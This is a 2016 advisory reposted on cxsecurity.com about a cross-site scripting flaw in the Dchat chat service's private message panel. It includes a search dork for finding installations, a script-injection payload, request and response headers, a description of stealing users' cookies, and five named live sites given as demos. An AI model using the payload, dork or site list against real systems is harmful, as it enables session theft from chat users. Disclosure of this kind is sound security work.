Dchat Service Cross Site Scripting

2016.03.12
Credit: Guardiran Security Team
Risk: Low
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-79
Dork: intext:"طراحی قالب اختصاصی توسط : دی چت"

* Exploit Title: Dchat Service Cross Site Scripting * Discovery Date: 2016/03/10 * Dork: intext: intext:"طراحی قالب اختصاصی توسط : دی چت" * Public Disclosure Date: 2016/03/12 * Exploit Author: Guardiran Security Team * Contact: https: http://guardiran.org * Vendor Homepage: http://dchat.org/ * Software Link: [-] * Version: All Version * Tested on: Dchat Chatrooms * Category: webapps Description ====================================================================== About Dchat Service: Dchat is a chat service provider. Dchat the best service provider with high security and Support 24-hour Cross-site scripting vulnerability occurs in private chat panel We can use this panel to bring the cookies of each user Exploit: The First We Have To Register With Commom User Next you need a user (such as chat General Manager) select and use a private chat panel Then, using a script placed to extract cookies do Hacking Website Good Luck PoC ====================================================================== XSS ~~~~~~~~~~~~~~ method="post" Function=Panel Private Messages Accept: aplication/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 content-Type: Application/x-www-from-urlencoded; charset=UTF-8 -- response -- HTTP/1.1 200OK Server nginx/1.4.6 (Ubuntu) Date: Thu, 10 mar 2016 19:18:47 GMT Content-Type: text/html Transfer-Encoding: Chunked Connection: close Vary: Accept-Encoding X-Powered-By: PHP/5.5.9-1ubuntu4.14 Expires: Thu, 19 Nov 1981 08:51:00 GMT Cache-Control: no=store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragme: no-cache Content-encoing: gzip Payload: ====================================================================== <script>alert('Xss')</script> or "><script>alert('Xss')</script> Demo: ====================================================================== * http://www.emrischat.org/ * http://www.yashilchat.com/ * http://www.toranchat.ir/ * http://www.faytunchat.com/ * http://www.metanatchat.ir/ * Discovered By :MR.IMAN * We Are Guardiran Security Team * Special Tnx: C0d3!nj3ct!0n , REX , MR.IMAN , GrYpHoN , alizombie , ColEctOR , * MRSEZAR And All Of member's Guardiran Security Team


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top